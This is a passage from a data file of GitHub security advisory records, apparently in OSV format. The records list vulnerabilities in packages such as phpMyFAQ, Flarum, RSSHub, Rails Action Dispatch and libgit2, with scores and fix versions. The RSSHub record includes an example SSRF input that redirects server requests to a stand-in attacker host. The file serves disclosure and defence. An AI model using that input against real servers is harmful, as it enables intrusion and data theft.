Lookup Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.9.2 can address this issue. The name of the patch is 5e25e4765637ea4b9e0bf5fcd5e9a922abee7eb3. It is recommended to upgrade the affected component. The identifier VDB-217441 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django-ucamlookup'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-15010'}, {'type': 'WEB', 'url': 'https://github.com/uisautomation/django-ucamlookup/commit/5e25e4765637ea4b9e0bf5fcd5e9a922abee7eb3'}, {'type': 'PACKAGE', 'url': 'https://github.com/uisautomation/django-ucamlookup'}, {'type': 'WEB', 'url': 'https://github.com/uisautomation/django-ucamlookup/releases/tag/1.9.2'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.217441'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.217441'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T20:03:05Z', 'nvd_published_at': '2023-01-05T09:15:00Z'}" 1.4.0,GHSA-m9xr-8cx7-53pj,2023-01-24T18:05:58Z,2023-01-16T00:30:24Z,,['CVE-2023-0314'],phpMyFAQ Reflected Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Reflected in GitHub repository thorsten/phpmyfaq prior to 3.1.10.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0314'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/3872e7eac2ddeac182fc1335cc312d1392d56f98'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/eac0a9d7-9721-4191-bef3-d43b0df59c67'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T22:01:26Z', 'nvd_published_at': '2023-01-15T22:15:00Z'}" 1.4.0,GHSA-j8wr-fwf2-vvr9,2023-02-03T20:29:29Z,2023-01-26T21:30:25Z,,['CVE-2022-25908'],Command Injection in create-choo-electron,All versions of the package create-choo-electron are vulnerable to Command Injection via the devInstall function due to improper user-input sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'create-choo-electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25908'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-CREATECHOOELECTRON-3157953'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:06:29Z', 'nvd_published_at': '2023-01-26T21:15:00Z'}" 1.4.0,GHSA-r3gm-jwf4-xgv2,2023-01-27T01:27:59Z,2023-01-26T21:30:18Z,,['CVE-2023-24437'],Cross-site request forgery vulnerability in Jenkins JIRA Pipeline Steps Plugin,"A cross-site request forgery (CSRF) vulnerability in Jenkins JIRA Pipeline Steps Plugin 2.0.165.v8846cf59f3db and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:jira-steps'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.165.v8846cf59f3db'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24437'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2786'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:27:59Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-8gcg-vwmw-rxj4,2023-01-23T18:52:11Z,2023-01-10T22:27:13Z,,['CVE-2023-22488'],Flarum notifications can leak restricted content,"Using the notifications feature, one can read restricted/private content and bypass access checks that would be in place for such content. The notification-sending component does not check that the subject of the notification can be seen by the receiver, and proceeds to send notifications through their different channels. The alerts do not leak data despite this as they are listed based on a visibility check, however, emails are still sent out. This means that, for extensions which restrict access to posts, any actor can bypass the restriction by subscribing to the discussion if the [*Subscriptions*](https://extiverse.com/extension/flarum/subscriptions) extension is enabled. ### Impact The attack allows the leaking of some posts in the forum database, including posts awaiting approval, posts in tags the user has no access to if they could subscribe to a discussion before it becomes private, and posts restricted by third-party extensions. Other leaks could also happen for different notification subjects if some features allowed to receive specific types of notifications for restricted content. All Flarum versions prior to v1.6.3 are affected. ### Patches The vulnerability has been fixed and published as flarum/core v1.6.3. All communities running Flarum should upgrade as soon as possible to v1.6.3 using: ``` composer update --prefer-dist --no-dev -a -W ``` You can then confirm you run the latest version using: ``` composer show flarum/core ``` ### Workarounds Disable the Flarum Subscriptions extension or disable email notifications altogether. **There is no other supported workaround for this issue for Flarum versions below 1.6.3.** ### For more information For any questions or comments on this vulnerability please visit https://discuss.flarum.org/ For support questions create a discussion at https://discuss.flarum.org/t/support. A reminder that if you ever become aware of a security issue in Flarum, please report it to us privately by emailing [security@flarum.org](mailto:security@flarum.org), and we will address it promptly. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'flarum/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/flarum/framework/security/advisories/GHSA-8gcg-vwmw-rxj4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22488'}, {'type': 'WEB', 'url': 'https://github.com/flarum/framework/commit/d0a2b95dca57d3dae9a0d77b610b1cb1d0b1766a'}, {'type': 'PACKAGE', 'url': 'https://github.com/flarum/framework'}, {'type': 'WEB', 'url': 'https://github.com/flarum/framework/releases/tag/v1.6.3'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-10T22:27:13Z', 'nvd_published_at': '2023-01-12T20:15:00Z'}" 1.4.0,GHSA-7p8m-22h4-9pj7,2023-01-20T22:38:04Z,2023-01-20T22:38:04Z,,['CVE-2022-23538'],scs-library-client may leak user credentials to third-party service via HTTP redirect,"### Impact When the scs-library-client is used to pull a container image, with authentication, the HTTP Authorization header sent by the client to the library service may be incorrectly leaked to an S3 backing storage provider. This occurs in a specific flow, where the library service redirects the client to a backing S3 storage server, to perform a multi-part concurrent download. Depending on site configuration, the S3 service may be provided by a third party. An attacker with access to the S3 service may be able to extract user credentials, allowing them to impersonate the user. The vulnerable multi-part concurrent download flow, with redirect to S3, is only used when communicating with a Singularity Enterprise 1.x installation, or third party server implementing this flow. Interaction with Singularity Enterprise 2.x, and Singularity Container Services (cloud.sylabs.io), does not trigger the vulnerable flow. We encourage all users to update. Users who interact with a Singularity Enterprise 1.x installation, using a 3rd party S3 storage service, are advised to revoke and recreate their authentication tokens within Singularity Enterprise. ### Patches The security issue was identified after the integration of a bug-fix commit 68ac4ca into the previously released scs-library-client 1.3.4. This commit fixes the security issue in the 1.3 series. scs-library-client 1.4.2 contains a fix for the same vulnerability in the 1.4 series, as commit eebd7ca. ### Workarounds There is no workaround available at this time. As above, access to Singularity Enterprise 2.x, or Singularity Container Services (cloud.sylabs.io), does not trigger the vulnerable flow. ### References https://cwe.mitre.org/data/definitions/522.html ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/sylabs/scs-library-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/sylabs/scs-library-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sylabs/scs-library-client/security/advisories/GHSA-7p8m-22h4-9pj7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-23538'}, {'type': 'WEB', 'url': 'https://github.com/sylabs/scs-library-client/commit/68ac4cab5cda0afd8758ff5b5e2e57be6a22fcfa'}, {'type': 'WEB', 'url': 'https://github.com/sylabs/scs-library-client/commit/b5db2aacba6bf1231f42dd475cc32e6355ab47b2'}, {'type': 'WEB', 'url': 'https://github.com/sylabs/scs-library-client/commit/eebd7caaab310b1fa803e55b8fc1acd9dcd2d00c'}, {'type': 'PACKAGE', 'url': 'https://github.com/sylabs/scs-library-client'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1497'}]","{'cwe_ids': ['CWE-522', 'CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T22:38:04Z', 'nvd_published_at': '2023-01-17T21:15:00Z'}" 1.4.0,GHSA-v3cg-7r9h-r2g6,2023-01-24T20:54:28Z,2023-01-24T20:54:28Z,,['CVE-2023-23613'],Field-level security issue with .keyword fields in OpenSearch,"### Advisory title: Field-level security issue with .keyword fields ### Affected versions: OpenSearch 1.0.0-1.3.7 and 2.0.0-2.4.1 ### Patched versions: OpenSearch 1.3.8 and 2.5.0 ### Impact: There is an issue in the implementation of field-level security (FLS) and field masking where rules written to explicitly exclude fields are not correctly applied for certain queries that rely on their auto-generated .keyword fields. This issue is only present for authenticated users with read access to the indexes containing the restricted fields. ### Workaround: FLS rules that use explicit exclusions can be written to grant explicit access instead. Policies authored in this way are not subject to this issue. ### Patches: OpenSearch versions 1.3.8 and 2.5.0 contain a fix for this issue. ### For more information: If you have any questions or comments about this advisory, please contact AWS/Amazon Security via our issue reporting page (https://aws.amazon.com/security/vulnerability-reporting/) or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opensearch:opensearch-security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.opensearch:opensearch-security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/opensearch-project/security/security/advisories/GHSA-v3cg-7r9h-r2g6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23613'}, {'type': 'WEB', 'url': 'https://github.com/opensearch-project/OpenSearch/releases/tag/2.5.0'}, {'type': 'PACKAGE', 'url': 'https://github.com/opensearch-project/security'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-24T20:54:28Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-64wp-jh9p-5cg2,2023-01-23T22:17:31Z,2023-01-11T22:04:44Z,,['CVE-2023-22493'],RSSHub SSRF vulnerability,"## Summary RSSHub is vulnerable to Server-Side Request Forgery (SSRF) attacks. This vulnerability allows an attacker to send arbitrary HTTP requests from the server to other servers or resources on the network. ## Description An attacker can exploit this vulnerability by sending a request to the affected routes with a malicious URL. For example, if an attacker controls the `ATTACKER.HOST` domain, they can send a request to affected routes with the value set to `ATTACKER.HOST%2F%23`. The `%2F` and `%23` characters are URL-encoded versions of the forward-slash (`/`) and pound (`#`) characters, respectively. In this context, an attacker could use those characters to append the base URL (i.e. `https://${input}.defined.host`) to be modified to `https://ATTACKER.HOST/#.defined.host`. This will cause the server to send a request to the attacker-controlled domain, allowing the attacker to potentially gain access to sensitive information or perform further attacks on the server. ## Impact An attacker could use this vulnerability to send requests to internal or any other servers or resources on the network, potentially gain access to sensitive information that would not normally be accessible and amplifying the impact of the attack. ## Reference Fixing PR: https://github.com/DIYgod/RSSHub/pull/11588","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'rsshub'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-master.a66cbcf'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/DIYgod/RSSHub/security/advisories/GHSA-64wp-jh9p-5cg2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22493'}, {'type': 'WEB', 'url': 'https://github.com/DIYgod/RSSHub/pull/11588'}, {'type': 'WEB', 'url': 'https://github.com/DIYgod/RSSHub/commit/a66cbcf6eebc700bf97ab097f404f16ab415506a'}, {'type': 'WEB', 'url': 'https://advisory.dw1.io/56'}, {'type': 'PACKAGE', 'url': 'https://github.com/DIYgod/RSSHub'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-11T22:04:44Z', 'nvd_published_at': '2023-01-13T15:15:00Z'}" 1.4.0,GHSA-8ph8-9q2j-c3rq,2023-01-12T23:41:46Z,2023-01-06T12:31:34Z,,['CVE-2018-25066'],nodebatis SQL Injection vulnerability,A vulnerability was found in PeterMu nodebatis up to 2.1.x. It has been classified as critical. Affected is an unknown function. The manipulation leads to sql injection. Upgrading to version 2.2.0 can address this issue. The name of the patch is 6629ff5b7e3d62ad8319007a54589ec1f62c7c35. It is recommended to upgrade the affected component. VDB-217554 is the identifier assigned to this vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nodebatis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-25066'}, {'type': 'WEB', 'url': 'https://github.com/PeterMu/nodebatis/commit/6629ff5b7e3d62ad8319007a54589ec1f62c7c35'}, {'type': 'PACKAGE', 'url': 'https://github.com/PeterMu/nodebatis'}, {'type': 'WEB', 'url': 'https://github.com/PeterMu/nodebatis/releases/tag/v2.2.0'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.217554'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.217554'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-12T23:41:46Z', 'nvd_published_at': '2023-01-06T11:15:00Z'}" 1.4.0,GHSA-3p73-mm7v-4f6m,2023-01-28T00:31:24Z,2023-01-27T00:55:11Z,,['CVE-2023-23617'], DoS vulnerability in MaliciousCode filter,"### Impact Infinite loop in malicious code filter in certain conditions. ### Workarounds None","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.4.22'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.0.0'}, {'fixed': '20.0.19'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/security/advisories/GHSA-3p73-mm7v-4f6m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23617'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/commit/494027785bdb7db53e60c11ef03c144b61cd3172'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenMage/magento-lts'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19'}]","{'cwe_ids': ['CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T00:55:11Z', 'nvd_published_at': '2023-01-28T00:15:00Z'}" 1.4.0,GHSA-9h7x-9pmh-7gg8,2023-01-12T16:49:06Z,2023-01-07T06:30:19Z,,['CVE-2023-0112'],usememos/memos vulnerable to stored Cross-site Scripting,Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.10.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/usememos/memos'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0112'}, {'type': 'WEB', 'url': 'https://github.com/usememos/memos/commit/46c13a4b7f675b92d297df6dabb4441f13c7cd9c'}, {'type': 'PACKAGE', 'url': 'https://github.com/usememos/memos'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ec2a29dc-79a3-44bd-a58b-15f676934af6'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T21:51:50Z', 'nvd_published_at': '2023-01-07T04:15:00Z'}" 1.4.0,GHSA-chgc-rqjr-46gg,2023-01-25T02:56:08Z,2023-01-17T09:30:24Z,,['CVE-2010-10008'],Cross Site Scripting in simplesamlphp-module-openidprovider,A vulnerability was found in simplesamlphp simplesamlphp-module-openidprovider up to 0.8.x. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file templates/trust.tpl.php. The manipulation of the argument StateID leads to cross site scripting. The attack can be launched remotely. Upgrading to version 0.9.0 is able to address this issue. The name of the patch is 8365d48c863cf06ccf1465cc0a161cefae29d69d. It is recommended to upgrade the affected component. The identifier VDB-218473 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'simplesamlphp/simplesamlphp-module-openidprovider'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2010-10008'}, {'type': 'WEB', 'url': 'https://github.com/simplesamlphp/simplesamlphp-module-openidprovider/commit/8365d48c863cf06ccf1465cc0a161cefae29d69d'}, {'type': 'PACKAGE', 'url': 'https://github.com/simplesamlphp/simplesamlphp-module-openidprovider'}, {'type': 'WEB', 'url': 'https://github.com/simplesamlphp/simplesamlphp-module-openidprovider/releases/tag/v0.9.0'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.218473'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.218473'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-25T02:56:08Z', 'nvd_published_at': '2023-01-17T08:15:00Z'}" 1.4.0,GHSA-g298-59pg-93h7,2023-01-28T01:20:05Z,2023-01-19T18:30:19Z,,['CVE-2023-0406'],Cross-Site Request Forgery in modoboa,Cross-Site Request Forgery (CSRF) in GitHub repository modoboa/modoboa prior to 2.0.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'modoboa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0406'}, {'type': 'WEB', 'url': 'https://github.com/modoboa/modoboa/commit/7f0573e917227686d2cc127be1364e2908740807'}, {'type': 'PACKAGE', 'url': 'https://github.com/modoboa/modoboa'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d7007f76-3dbc-48a7-a2fb-377040fe100c'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-28T01:20:05Z', 'nvd_published_at': '2023-01-19T18:15:00Z'}" 1.4.0,GHSA-fpjc-cxr6-w6h8,2023-01-12T16:49:23Z,2023-01-07T06:30:19Z,,['CVE-2023-0108'],usememos/memos vulnerable to stored Cross-site Scripting,Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.10.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/usememos/memos'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0108'}, {'type': 'WEB', 'url': 'https://github.com/usememos/memos/commit/46c13a4b7f675b92d297df6dabb4441f13c7cd9c'}, {'type': 'PACKAGE', 'url': 'https://github.com/usememos/memos'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/f66d33df-6588-4ab4-80a0-847451517944'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T21:53:46Z', 'nvd_published_at': '2023-01-07T04:15:00Z'}" 1.4.0,GHSA-8xww-x3g3-6jcv,2023-05-16T15:48:14Z,2023-01-18T18:20:51Z,,['CVE-2023-22795'],ReDoS based DoS vulnerability in Action Dispatch,"There is a possible regular expression based DoS vulnerability in Action Dispatch related to the If-None-Match header. This vulnerability has been assigned the CVE identifier CVE-2023-22795. Versions Affected: All Not affected: None Fixed Versions: 5.2.8.15 (Rails LTS), 6.1.7.1, 7.0.4.1 Impact A specially crafted HTTP If-None-Match header can cause the regular expression engine to enter a state of catastrophic backtracking, when on a version of Ruby below 3.2.0. This can cause the process to use large amounts of CPU and memory, leading to a possible DoS vulnerability All users running an affected release should either upgrade or use one of the workarounds immediately. Releases The FIXED releases are available at the normal locations. Workarounds We recommend that all users upgrade to one of the FIXED versions. In the meantime, users can mitigate this vulnerability by using a load balancer or other device to filter out malicious If-None-Match headers before they reach the application. Users on Ruby 3.2.0 or greater are not affected by this vulnerability. Patches To aid users who aren’t able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset. 6-1-Avoid-regex-backtracking-on-If-None-Match-header.patch - Patch for 6.1 series 7-0-Avoid-regex-backtracking-on-If-None-Match-header.patch - Patch for 7.0 series Please note that only the 7.0.Z and 6.1.Z series are supported at present, and 6.0.Z for severe vulnerabilities. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases.",[],"[{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.7.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22795'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2023-22795-possible-redos-based-dos-vulnerability-in-action-dispatch/82118'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/releases/tag/v7.0.4.1'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2023-22795.yml'}, {'type': 'WEB', 'url': 'https://rubyonrails.org/2023/1/17/Rails-Versions-6-0-6-1-6-1-7-1-7-0-4-1-have-been-released'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-01-18T18:20:51Z', 'nvd_published_at': '2023-02-09T20:15:00Z'}" 1.4.0,GHSA-g3j5-mpp2-2fqm,2023-01-26T19:53:12Z,2023-01-26T19:53:11Z,,[],symfont/process typosquatting malware spoofs symfony/process,"In September 2021, security researchers discovered a malicious Composer package called `symfont/process`, a typosquat targeting users of `symfony/process`. The malicious package has since been removed from Packagist.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'symfont/process'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfont/process/2021-09-10.yaml'}, {'type': 'WEB', 'url': 'https://www.kernelmode.blog/typosquatting-malware-found-in-composer-repository/'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-26T19:53:11Z', 'nvd_published_at': None}" 1.4.0,GHSA-79wq-g4v9-gfj4,2023-01-20T23:36:16Z,2023-01-14T15:30:24Z,,['CVE-2022-2815'],Publify Core does not strip metadata from images,Insecure Storage of Sensitive Information in GitHub repository publify/publify prior to 9.2.10.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'publify_core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.2.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-2815'}, {'type': 'WEB', 'url': 'https://github.com/publify/publify/commit/af69097d349f4c00f244c51cd3c3e937fd3387cd'}, {'type': 'WEB', 'url': 'https://github.com/publify/publify_core/commit/33f897c12b6efdcdfd8cf9df924deba0f878b71e'}, {'type': 'PACKAGE', 'url': 'https://github.com/publify/publify'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/publify_core/CVE-2022-2815.yml'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/22fdcc39-8c1a-4e4c-8eae-be3fd764f8b4'}]","{'cwe_ids': ['CWE-922'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T23:36:16Z', 'nvd_published_at': '2023-01-14T14:15:00Z'}" 1.4.0,GHSA-m4ch-rfv5-x5g3,2023-01-20T23:36:41Z,2023-01-20T23:36:41Z,,[],git2-rs fails to verify SSH keys by default,"The git2 and libgit2-sys crates are Rust wrappers around the [libgit2](https://libgit2.org/) C library. It was discovered that libgit2 1.5.0 and below did not verify SSH host keys when establishing an SSH connection, exposing users of the library to Man-In-the-Middle attacks. The libgit2 team assigned [CVE-2023-22742](https://github.com/libgit2/libgit2/security/advisories/GHSA-8643-3wh5-rmjq) to this vulnerability. The following versions of the libgit2-sys Rust crate have been released: * libgit2-sys 0.14.2, updating the underlying libgit2 C library to version 1.5.1. * libgit2-sys 0.13.5, updating the underlying libgit2 C library to version 1.4.5. A new git2 crate version has also been released, 0.16.1. This version only bumps its libgit2-sys dependency to ensure no vulnerable libgit2-sys versions are used, but contains no code changes: if you update the libgit2-sys version there is no need to also update the git2 crate version. [You can learn more about this vulnerability in libgit2's advisory](https://github.com/libgit2/libgit2/security/advisories/GHSA-8643-3wh5-rmjq)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'libgit2-sys'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.14.0'}, {'fixed': '0.14.2'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'libgit2-sys'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.13.5'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'git2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.16.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/libgit2/libgit2/security/advisories/GHSA-8643-3wh5-rmjq'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/git2-rs/security/advisories/GHSA-m4ch-rfv5-x5g3'}, {'type': 'ADVISORY', 'url': 